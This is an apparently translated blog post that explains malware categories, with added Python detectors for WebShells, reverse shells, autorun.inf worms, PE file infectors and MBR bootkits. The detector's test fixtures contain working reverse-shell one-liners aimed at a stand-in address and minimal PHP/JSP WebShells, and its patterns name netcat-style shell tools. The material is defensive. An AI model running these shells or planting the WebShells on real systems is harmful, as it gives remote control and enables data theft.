How much do you know about attack payloads, Trojan horses, worms, and infectious viruses?

Malicious programs are programs built with attacking intent in the digital world. They are usually divided into attack payloads, Trojan horses, worms, and infectious viruses.

1. Attack payload

An attack payload is the carrier the attacker uses to launch the initial attack and establish a network connection. By function, payloads can be divided into delivery types, connection-control types, and independent attack types.

  • Delivery types include remote exploit payloads, phishing emails, and malicious documents.

  • Connection-control types include WebShells, reverse shells, backdoor Trojans (BackDoor), and so on.

  • Independent attack types use standard shells such as SSH, RDP, and Telnet.

  • The goal of a remote exploit payload is to carry out a remote network intrusion and gain the ability to execute commands on the target system. The well-known "EternalBlue" exploit works this way. Such payloads are usually small and, once they have obtained system privileges, typically perform only a few operations such as downloading a second stage. If the host is not needed as a springboard for further expansion, such payloads generally exist only in memory.

  • Phishing emails are another common delivery payload. The most common method is an attachment: if you are induced to open the document or program inside it, a backdoor Trojan may be planted. A more concealed method combines phishing with browser vulnerabilities: the email contains a URL or an image carrying a link, and if your browser is vulnerable, clicking the link may compromise you. The most advanced phishing emails use "nuclear weapons" such as 0-days in the mail client or the underlying system; merely opening the email can compromise you without any further action.

  • Malicious documents usually accompany phishing. Beyond email, attackers increasingly use chat tools, impersonating business partners, HR recruiters, and other roles, to deliver documents that contain exploit code.

  • A WebShell is the most common connection-control payload. If the target is a web application server, after the initial compromise the attacker drops a PHP or JSP script implementing command and control into a suitable directory; control and data theft are then carried out simply by accessing it through a URL.

  • A reverse shell ("rebound shell") is a script payload in which the compromised host actively connects out to the attacker's server, which then controls it. It is usually written in Bash, Python, or PHP, or assembled from tools such as telnet, and it establishes residency on the system to support a sustained attack.

  • A backdoor Trojan is the covert channel the attacker implants after the intrusion is complete. It is used for remote control and command execution; it is very powerful and can capture screens, steal data, and destroy systems, making it a key weapon in APT (advanced persistent threat) attacks.

  • Standard shell attacks use the remote services provided by software such as SSH, Telnet, RDP, and "Gray Pigeon" remote assistance, for example through weak-password attacks. Once the intrusion succeeds, the system's own remote services are used for control and command operations.
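The two connection-control payloads above, a WebShell reached over a URL and a reverse shell that dials out, leave recognisable traces in web-root files and in process command lines. The following is an added example, not code from the original post: a small Python scanner that flags request parameters flowing into an execution sink in PHP/JSP files, and reverse-shell idioms in process command lines such as an EDR or auditd would record. All sample files, command lines, and the 203.0.113.5 address are constructed for the example.

```python
"""Added example: indicator checks for WebShells and reverse shells.
Sample files and command lines below are constructed, not real captures."""
import re
from typing import Dict, List

# --- WebShell indicators: request parameters flowing into an execution sink ---
PHP_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\[")
PHP_SINK = re.compile(r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
PHP_DECODER = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
JSP_INPUT = re.compile(r"request\.getParameter\s*\(")
JSP_SINK = re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(")


def webshell_indicators(source: str) -> List[str]:
    """Return human-readable reasons a PHP/JSP file looks like a WebShell."""
    hits: List[str] = []
    if PHP_INPUT.search(source) and PHP_SINK.search(source):
        hits.append("php: request parameter reaches an execution sink")
    if PHP_DECODER.search(source) and re.search(r"\beval\s*\(", source):
        hits.append("php: eval over a decoded (obfuscated) payload")
    if JSP_INPUT.search(source) and JSP_SINK.search(source):
        hits.append("jsp: request parameter reaches Runtime.exec")
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map path -> indicators for every file that has at least one."""
    return {path: hits for path, hits in ((p, webshell_indicators(s)) for p, s in files.items()) if hits}


# --- Reverse-shell indicators on process command lines (auditd / EDR telemetry) ---
REVERSE_SHELL_PATTERNS = [
    (re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"), "bash /dev/tcp redirection"),
    (re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+/bin/(?:ba)?sh"), "netcat -e shell"),
    (re.compile(r"\bmkfifo\b.*\|\s*(?:nc|ncat|telnet)\b"), "fifo-backed netcat/telnet shell"),
    (re.compile(r"socket\.socket\(.*\bdup2\(.*/bin/(?:ba)?sh"), "python socket + dup2 shell"),
    (re.compile(r"fsockopen\(.*\b(?:exec|system|shell_exec)\("), "php fsockopen shell"),
]


def reverse_shell_indicators(cmdline: str) -> List[str]:
    """Return the labels of every reverse-shell idiom found in one command line."""
    return [label for pat, label in REVERSE_SHELL_PATTERNS if pat.search(cmdline)]


# Constructed sample web-root files (paths and contents are invented for this example).
SAMPLE_FILES: Dict[str, str] = {
    "upload/shell.php": "<?php @eval($_POST['cmd']); ?>",
    "upload/x.php": "<?php eval(base64_decode($_REQUEST['x'])); ?>",
    "admin/cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("c")); %>',
    "index.php": "<?php echo htmlspecialchars($_GET['name']); ?>",   # benign: input but no sink
}

# Constructed sample command lines; the first three dial out, the last three are benign.
SAMPLE_CMDLINES: List[str] = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f",
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",4444));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
    "nc -zv 10.0.0.5 80",
    "ssh -L 8080:localhost:80 user@10.0.0.5",
    "/usr/bin/python3 /opt/app/server.py --port 4444",
]

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, hits)
    for cmd in SAMPLE_CMDLINES:
        print(reverse_shell_indicators(cmd) or ["-"], cmd[:60])
```

The WebShell rules are deliberately source-to-sink rather than a list of known file hashes, because the scripts are trivially re-obfuscated; the command-line rules catch the outbound-connection step the text describes, which is also why egress filtering on servers is the cheaper control.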

2. Trojan horse

Trojans are the most numerous type of malicious program. Common Trojans include backdoor Trojans, online banking Trojans, account-stealing Trojans, homepage-hijacking Trojans, advertising Trojans, ransomware Trojans, and mining Trojans.

  • Backdoor Trojan: the covert channel the attacker implants after the intrusion, used for remote control and command execution. It is very powerful, able to capture screens, steal data, destroy systems, and so on, and is a key weapon in APT (advanced persistent threat) attacks.

  • Online banking Trojans: these mainly use two methods. One is to directly steal account numbers and passwords; the other is to tamper with the recipient account and the amount during a payment. With the strengthening of protections such as bank USB tokens ("USB shields"), security controls, and multi-factor authentication, online banking Trojans have become rare in China.

  • Account-stealing Trojans: the growth of the Internet has given everyone many accounts, and to the criminal underground these accounts are valuable, especially chat and online-game accounts. Common theft methods include keylogging, reading credentials from memory, and fake login interfaces.

  • Homepage-hijacking Trojans: the browser's start page is an important traffic entry point and a major source of revenue for many Internet companies. Driven by profit, Trojans that lock the homepage remain popular to this day.

  • Advertising Trojans: malicious pop-up advertising is another mainstream way of monetising Trojans. Besides Trojans, many dubious software products also push ads, especially around shopping festivals such as 618 and Double 11, which greatly harasses users' desktops. Some Trojans play a further trick: instead of actually showing a pop-up, they render advertisements invisibly in the background to defraud advertisers of their ad fees.

  • Ransomware Trojans: early ransomware locked the system and demanded a ransom. Today it mainly encrypts files on computers (including servers) and offers decryption after payment. Digital currencies have developed rapidly in recent years, and their anonymity makes transactions hard to trace, which objectively encourages the underground economy and cybercrime; at present almost all ransomware demands payment in digital currency.

  • Mining Trojans: mining Trojans do not destroy files; they quietly use the CPU and graphics card in the background to mine digital currency for the Trojan's author. The only thing the victim notices is that the computer runs more slowly.

3. Worms

The defining feature of worms is self-replication and active propagation. By propagation method, worms can be divided into network worms, mail worms, share worms, chat worms, and so on.

  • Network worms: this type uses built-in exploitation to automatically find vulnerable targets and compromise them, roaming freely across the network. The famous WannaCry is such a worm: it exploited "EternalBlue" (leaked from the NSA, the U.S. National Security Agency) and other vulnerabilities, swept the world in a short time, and delivered a ransomware Trojan, causing serious disruption to businesses and production. Once such a worm is released it is like an opened Pandora's box and hard to control. WannaCry's author included a "kill switch"; otherwise the damage would have been several times greater.

  • Mail worms: this type usually harvests the address list on the compromised system and then uses its own mail engine to send infected mail to those addresses, infecting and controlling more computers. With big-data mining applied to anti-spam, the living space of such worms is now very narrow.

  • Share worms: this type spreads by dropping the virus body into shared directories, and usually has to trick users into double-clicking it to run. USB-drive worms, however, run when the drive is opened, by exploiting the "autorun" feature (autorun.inf). Moreover, combined with a shortcut (LNK) vulnerability, it is theoretically possible to infect a machine merely by opening the shared directory.

  • Chat worms: this type spreads through chat tools; examples are "QQ Tail" and "MSN Bookworm". Attackers post tempting content in chat software or chat rooms with a virus link attached. Through the efforts of the chat software vendors' security teams, such worms have essentially disappeared.
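The autorun.inf trick used by the USB-drive worms above is a plain INI file, so it can be audited before a share or removable drive is trusted. The following is an added example (not from the original post): a Python parser for the [autorun] section that flags the directives a worm relies on, namely an executable launched on open, an Explorer verb override, a target hidden in a system folder, and a disguised double extension. Both sample files are constructed for this example and are not taken from real malware.

```python
"""Added example: audit an autorun.inf for worm-style execution tricks.
The two sample files below are constructed, not real malware."""
import re
from typing import Dict, List

# Folders worms favour because Explorer hides them by default.
SUSPICIOUS_DIRS = {"recycler", "recycled", "$recycle.bin", "system volume information"}
# "photo.jpg.exe" style names that hide the real extension from a casual glance.
DOUBLE_EXT = re.compile(r"\.(?:jpg|jpeg|png|gif|bmp|doc|docx|pdf|txt|xls)\.(?:exe|scr|com|bat|cmd|pif|vbs|js)$")


def parse_autorun(text: str) -> Dict[str, str]:
    """Minimal INI reader for the [autorun] section.

    Keys are lower-cased and whitespace-trimmed because samples vary case and
    spacing to dodge naive signature matching; later duplicates win here.
    """
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def _target_path(value: str) -> str:
    """First token of an open=/shellexecute=/shell\\...\\command= value: the program run."""
    tokens = value.split()
    return tokens[0].strip('"').lower() if tokens else ""


def autorun_report(text: str) -> Dict[str, object]:
    """Return whether the file launches anything and a list of suspicious traits."""
    entries = parse_autorun(text)
    findings: List[str] = []
    targets: Dict[str, str] = {}          # program path -> key that references it

    for key, value in entries.items():
        if key in ("open", "shellexecute"):
            targets.setdefault(_target_path(value), key)
        elif key.startswith("shell\\") and key.endswith("\\command"):
            # Overriding the drive's Explorer verb makes a double-click on the
            # drive itself run the program, even when AutoPlay is disabled.
            targets.setdefault(_target_path(value), key)
            findings.append(f"{key} overrides the drive's Explorer verb")

    if entries.get("useautoplay") == "1":
        findings.append("useautoplay=1 requests execution on insertion")

    for path in targets:
        parts = path.replace("/", "\\").split("\\")
        dirs, name = parts[:-1], parts[-1]
        if any(d in SUSPICIOUS_DIRS or d.startswith(".") for d in dirs):
            findings.append(f"target '{path}' lives in a hidden/system folder")
        if DOUBLE_EXT.search(name):
            findings.append(f"target '{path}' uses a disguised double extension")

    return {"executes": bool(targets), "findings": findings}


# Constructed: the kind of autorun.inf a software CD-ROM legitimately ships.
LEGIT_CDROM = """[autorun]
open=setup.exe
icon=setup.ico
label=Product Installer
"""

# Constructed: the pattern the text describes for a USB-drive worm.
WORM_USB = """[AutoRun]
; padding comments are common in real samples
Open = RECYCLER\\S-1-5-21-1482476501\\photo.jpg.exe
shell\\open\\Command = RECYCLER\\S-1-5-21-1482476501\\photo.jpg.exe
shell\\open\\Default = 1
UseAutoPlay = 1
icon = %SystemRoot%\\system32\\shell32.dll,4
"""

if __name__ == "__main__":
    for label, sample in (("cd-rom", LEGIT_CDROM), ("usb worm", WORM_USB)):
        print(label, autorun_report(sample))
```

Note that the legitimate installer also "executes"; the decision is a policy one (optical media may autorun, removable drives and shares should not), which is why Windows 7 and later honour autorun.inf only on optical media and why the report separates the bare `executes` flag from the worm-specific findings.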

4. Infectious virus

An infectious virus corresponds to the narrow definition of a virus: its main feature is to infect and parasitise normal applications. When an infected program runs, the virus code executes first and then jumps to the original application code. Compared with Trojans and worms, infectious viruses require more skill to write and are harder for ordinary antivirus software to remove cleanly.

Influenced by the Cybersecurity Law and the "Panda Burning Incense" case, no new infectious viruses have appeared in China in recent years. However, veteran viruses (Ramnit and others) still lurk in corners of the network and mount small-scale outbreaks from time to time.
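The "virus code runs first, then jumps back to the application" behaviour described above usually shows up in the PE header before any code is analysed: the infector appends its body as a new section and redirects AddressOfEntryPoint into it. The following is an added example, not code from the original post: a stdlib-only Python PE header parser with the entry-point heuristics a triage script would apply (entry in the last section, entry outside the first code section, writable-and-executable entry section). The two PE images are constructed header-only test inputs, not real programs.

```python
"""Added example: PE entry-point heuristics for appended-code file infectors.
The two images are constructed header-only PE32 test inputs, not real programs."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    characteristics: int


def parse_pe(data: bytes) -> Tuple[int, List[Section]]:
    """Return (AddressOfEntryPoint, section table) from a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    size_of_optional, = struct.unpack_from("<H", data, coff + 16)
    optional = coff + 20
    entry_rva, = struct.unpack_from("<I", data, optional + 16)   # same offset in PE32 and PE32+
    table = optional + size_of_optional
    sections: List[Section] = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append(Section(name, vaddr, vsize, chars))
    return entry_rva, sections


def entry_point_findings(data: bytes) -> List[str]:
    """Heuristics: a clean compiler-built binary starts inside its first code section."""
    entry_rva, sections = parse_pe(data)
    findings: List[str] = []
    host = next(((i, s) for i, s in enumerate(sections)
                 if s.virtual_address <= entry_rva < s.virtual_address + s.virtual_size), None)
    if host is None:
        return [f"entry point 0x{entry_rva:X} lies outside every section"]
    idx, sec = host
    if len(sections) > 1 and idx == len(sections) - 1:
        findings.append(f"entry point is in the last section '{sec.name}' (appended code?)")
    if not sec.characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section '{sec.name}' is not executable")
    if sec.characteristics & IMAGE_SCN_MEM_WRITE and sec.characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section '{sec.name}' is writable and executable")
    first_code = next((s for s in sections if s.characteristics & IMAGE_SCN_CNT_CODE), None)
    if first_code is not None and first_code is not sec:
        findings.append(f"entry point is in '{sec.name}', not the first code section '{first_code.name}'")
    return findings


def build_pe(sections: List[Section], entry_rva: int) -> bytes:
    """Constructed header-only PE32 image used as test input for this example."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    size_of_optional = 0xE0
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", optional, 16, entry_rva)     # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", s.name.encode().ljust(8, b"\0"),
                    s.virtual_size, s.virtual_address, s.virtual_size, 0, 0, 0, 0, 0, s.characteristics)
        for s in sections)
    return dos + b"PE\0\0" + coff + bytes(optional) + table


TEXT = Section(".text", 0x1000, 0x2000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
DATA = Section(".data", 0x3000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
# Infector-style section: writable+executable code appended after .data, with the entry moved into it.
VIRUS = Section(".vir", 0x4000, 0x0800,
                IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

CLEAN_PE = build_pe([TEXT, DATA], entry_rva=0x1234)
INFECTED_PE = build_pe([TEXT, DATA, VIRUS], entry_rva=0x4010)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("infected", INFECTED_PE)):
        print(label, entry_point_findings(image) or ["no findings"])
```

Packers and some legitimate protectors trigger the same heuristics, so these findings are a triage signal for closer analysis rather than a verdict; the point of the check is that it needs only the header, not emulation of the jump back into the host code.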

5. Rootkit and Bootkit

Rootkits and bootkits sit at the lowest layers of the system; in theory they can modify or damage anything in the operating system kernel.

  • Rootkit: security software detects and kills viruses through active defence and powerful scanning engines, and usually runs with system privileges to gain the upper hand. A rootkit enters the system kernel and obtains the same privileges as the antivirus software (comparable to rooting a phone), after which it can hide itself (become invisible), entrench itself (resist removal), and attack the security software (disable it), so it is very hard to clear.

  • Bootkit: a more advanced technique than a rootkit. By infecting the disk boot area (MBR, VBR), the motherboard BIOS, and similar low-level components, it gains an earlier boot opportunity than security software. With the public disclosure of such code, bootkit techniques have increasingly been adopted by the criminal underground; well-known examples are the "Dark Cloud" series, "White Ghost", and "Hidden Soul".

Security software has few advantages against rootkits and bootkits, so defence should focus on intercepting such threats at the entry or execution stage. In addition, these viruses are often spread through pirated system images and enter the system before the security software does. Leading domestic security vendors have added dedicated removal routines to their PC manager or guard products and released standalone "First Aid Box" tools for deep cleanup.
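Because an MBR bootkit must change the first sector to run before the operating system, the cheapest detection is the one the text implies by "interception at the entry stage": record the boot code of a known-clean disk and compare it on every check, while sanity-checking the partition table for slots repurposed as hidden storage. The following is an added example, not code from the original post. Both sectors are constructed test inputs; on a real machine the 512 bytes would be read from the raw disk device with administrator rights, and the baseline hash recorded when the system was known to be clean. The partition-slot trick in the infected sample is an illustrative construction, not a description of any named bootkit.

```python
"""Added example: MBR baseline and partition-table sanity check.
Both sectors are constructed test inputs, not dumps from a real disk."""
import hashlib
import struct
from dataclasses import dataclass
from typing import List

SECTOR_SIZE = 512
BOOT_CODE_END = 440          # bytes 440..445 hold the disk signature and a reserved word
PARTITION_TABLE = 446        # four 16-byte entries follow
SIGNATURE = b"\x55\xAA"


@dataclass
class Partition:
    status: int
    type: int
    lba_start: int
    sectors: int


def parse_partitions(sector: bytes) -> List[Partition]:
    """Decode the four classic MBR partition entries (CHS fields are ignored)."""
    parts: List[Partition] = []
    for i in range(4):
        off = PARTITION_TABLE + 16 * i
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from("<B3sB3sII", sector, off)
        parts.append(Partition(status, ptype, lba, count))
    return parts


def boot_code_hash(sector: bytes) -> str:
    return hashlib.sha256(sector[:BOOT_CODE_END]).hexdigest()


def mbr_findings(sector: bytes, baseline_hash: str) -> List[str]:
    """Compare boot code with a known-good hash and sanity-check the partition table."""
    if len(sector) != SECTOR_SIZE:
        return [f"unexpected sector size {len(sector)}"]
    findings: List[str] = []
    if sector[510:512] != SIGNATURE:
        findings.append("boot signature 0x55AA missing")
    if boot_code_hash(sector) != baseline_hash:
        findings.append("boot code differs from the recorded baseline")
    parts = parse_partitions(sector)
    if sum(1 for p in parts if p.status == 0x80) > 1:
        findings.append("more than one partition marked active")
    for i, p in enumerate(parts):
        if p.status not in (0x00, 0x80):
            findings.append(f"partition {i}: invalid status byte 0x{p.status:02X}")
        if p.type == 0 and (p.lba_start or p.sectors):
            findings.append(f"partition {i}: empty type but non-zero extent (hidden storage?)")
    return findings


def build_mbr(boot_code: bytes, partitions: List[Partition]) -> bytes:
    """Constructed 512-byte sector for this example."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    struct.pack_into("<I", sector, 440, 0x1234ABCD)     # disk signature (arbitrary)
    for i, p in enumerate(partitions[:4]):
        struct.pack_into("<B3sB3sII", sector, PARTITION_TABLE + 16 * i,
                         p.status, b"\0\0\0", p.type, b"\0\0\0", p.lba_start, p.sectors)
    sector[510:512] = SIGNATURE
    return bytes(sector)


# A conventional boot-stub prologue (cli; xor ax,ax; mov ss,ax; mov sp,0x7C00; sti), then zeros.
CLEAN_BOOT_CODE = bytes([0xFA, 0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C, 0xFB])
SYSTEM_PARTITION = Partition(status=0x80, type=0x07, lba_start=2048, sectors=204800)

CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, [SYSTEM_PARTITION])
BASELINE_HASH = boot_code_hash(CLEAN_MBR)

# Bootkit-style modification (constructed): a short jump is prepended to the stub and a
# partition slot with type 0 is given a non-zero extent to mark where the body was stored.
INFECTED_MBR = build_mbr(bytes([0xEB, 0x3E]) + CLEAN_BOOT_CODE,
                         [SYSTEM_PARTITION, Partition(status=0x00, type=0x00, lba_start=40, sectors=20)])

if __name__ == "__main__":
    print("clean   ", mbr_findings(CLEAN_MBR, BASELINE_HASH) or ["no findings"])
    print("infected", mbr_findings(INFECTED_MBR, BASELINE_HASH))
```

The baseline must be captured and stored outside the machine being checked, since a kernel-level rootkit can lie to a reader running on the infected system; the same limitation is why the text recommends a standalone cleanup tool rather than the resident guard product. The check also cannot see a body stored in the unused sectors before the first partition without reading those sectors too.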


Source: blog.csdn.net/qq_32044265/article/details/131783646